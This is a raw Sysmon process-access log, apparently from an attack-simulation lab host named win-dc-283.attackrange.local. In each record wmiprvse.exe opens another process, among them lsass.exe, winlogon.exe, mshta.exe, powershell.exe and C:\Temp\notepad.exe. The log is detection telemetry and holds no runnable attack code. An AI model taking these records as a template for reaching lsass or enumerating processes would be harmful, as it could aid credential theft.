16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029665Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029664Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.765{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029663Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.765{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029662Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.765{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029661Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.765{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029660Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.765{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029659Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.765{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029658Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.765{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029657Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.765{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029656Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.765{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029655Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.765{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029654Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.765{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029653Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.577{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5457-6008-BF06-00000000A301}5556C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029652Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.577{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5457-6008-BE06-00000000A301}1228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029651Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.577{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5457-6008-BD06-00000000A301}6332C:\Temp\notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029650Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.577{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029649Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.577{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029648Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.577{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029647Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.577{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029646Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 